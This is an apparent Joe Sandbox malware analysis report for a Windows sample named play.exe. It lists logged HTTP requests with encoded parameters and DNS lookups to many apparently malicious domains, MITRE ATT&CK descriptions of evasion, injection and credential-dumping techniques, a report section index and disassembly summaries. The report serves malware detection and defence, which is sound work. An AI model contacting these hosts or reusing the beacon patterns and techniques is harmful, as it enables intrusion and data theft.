Source: global traffic	HTTP traffic detected: GET /qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM= HTTP/1.1Host: www.playdoge.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx HTTP/1.1Host: www.farukugurluakdogan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno= HTTP/1.1Host: www.pacoteagil.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx HTTP/1.1Host: www.23ddv.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx HTTP/1.1Host: www.pilibit.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4= HTTP/1.1Host: www.astrocloud.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx HTTP/1.1Host: www.rantup.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx HTTP/1.1Host: www.sssqqq07-22.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /qer4/?ZXzt1jdX=UQTe8T+Iiqz9DT0FlyqPvcGPqOgPe8+u3s7KU5oKxN2bJ9UfIOk7myDXpD+ZujeoMjeiGDcwHIyYgzCoICrrm0QdeA2m/FQRgN8WzYZXzVLDjgJaJykIP/c=&fVU8=HRzx HTTP/1.1Host: www.shipincheshi.skinAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /byvv/?fVU8=HRzx&ZXzt1jdX=tE8Yf8WYynwECT0ucMl0wg/uU5lgFM4d0lH0abgHpBN2sUJXXfRRiqZbMUuokEJXmaYUQiqZbA9PoCScD7vXiY1sERFkkaBh5gb6EBRxs5CGi9vgIcMFHkg= HTTP/1.1Host: www.ablackwomansmarch.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G+FujZTnvobDNePA17XvJlKosOwY30TiI8/8bBp7iesbvq7jnISR7nTIeFXysPRp6fhppRWXfcEPYVY19hX8MgB2Jw=&fVU8=HRzx HTTP/1.1Host: www.kiristyle.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1

Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.dom-2.online
Source: global traffic	DNS traffic detected: DNS query: www.soliro.life
Source: global traffic	DNS traffic detected: DNS query: www.playdoge.buzz
Source: global traffic	DNS traffic detected: DNS query: www.farukugurluakdogan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pacoteagil.shop
Source: global traffic	DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
Source: global traffic	DNS traffic detected: DNS query: www.23ddv.top
Source: global traffic	DNS traffic detected: DNS query: www.pilibit.site
Source: global traffic	DNS traffic detected: DNS query: www.astrocloud.shop
Source: global traffic	DNS traffic detected: DNS query: www.rantup.com
Source: global traffic	DNS traffic detected: DNS query: www.sssqqq07-22.fun
Source: global traffic	DNS traffic detected: DNS query: www.shipincheshi.skin
Source: global traffic	DNS traffic detected: DNS query: www.ablackwomansmarch.info
Source: global traffic	DNS traffic detected: DNS query: www.kiristyle.shop
Source: global traffic	DNS traffic detected: DNS query: www.x0x9x8x8x7x6.shop

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report play.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\--x702s3

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
play.exe

Function 00BB91E3 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Function 00BB8373 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00BCD283 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 00BB49F3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 181
COMMON

Function 00BB4B97 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64
threadwindowCOMMON

Function 00BB4BA3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60
threadwindowCOMMON

Function 00BB8419 Relevance: 1.5, APIs: 1, Instructions: 31
libraryloaderCOMMON

Function 00BCD5C3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00BCD613 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00BCD663 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre